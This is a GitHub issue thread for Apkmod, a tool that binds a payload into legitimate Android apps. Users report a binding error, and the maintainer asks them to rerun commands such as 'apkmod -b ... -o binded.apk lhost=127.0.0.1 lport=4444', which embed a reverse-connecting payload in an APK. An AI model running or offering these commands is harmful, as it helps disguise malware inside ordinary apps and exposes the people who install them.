Hax4us / Apkmod

Apkmod can decompile, recompile, sign APK, and bind the payload with any legit APP
GNU General Public License v3.0
730 stars 98 forks source link

Error #8

Closed Chingo-X closed 5 years ago

Chingo-X commented 5 years ago

Hello Any help plz ? Thanks for this great tool Screenshot_20190929-160809_Termux

Hax4us commented 5 years ago

Run it and give screenshot sh -x $(which apkmod) -b /sdcard/app-release.apk -o /sdcard/binded.apk lhost=127.0.0.1 lport=4444

Chingo-X commented 5 years ago

It gives me same bug

sh -x $(which apkmod) -b /sdcard/app-release.apk -o /sdcard/binded.apk lhost=127.0.0.1 lport=4444

Chingo-X commented 5 years ago

[ Screenshot_20190929-163337_Termux

Hax4us commented 5 years ago

Well how did you install metasploit ?

Hax4us commented 5 years ago

Closing with https://github.com/Hax4us/Apkmod/commit/850aa0a28c9ca26d1a65ddb705f72106afab046d

hocinelop commented 5 years ago

Still same problem u0_a132@localhost ~> apkmod -b /sdcard/apps/play.apk -o /sdcard/apps/binded_play.apk LHOST=127.0.0.1 LPORT=4444 [*] Binding /storage/emulated/0/apps/play.apk Using APK template: /storage/emulated/0/apps/play.apk Error: wrong number of arguments (given 2, expected 3) [!] Try again with -a option But if still can't bind, take screenshot and open a issue on github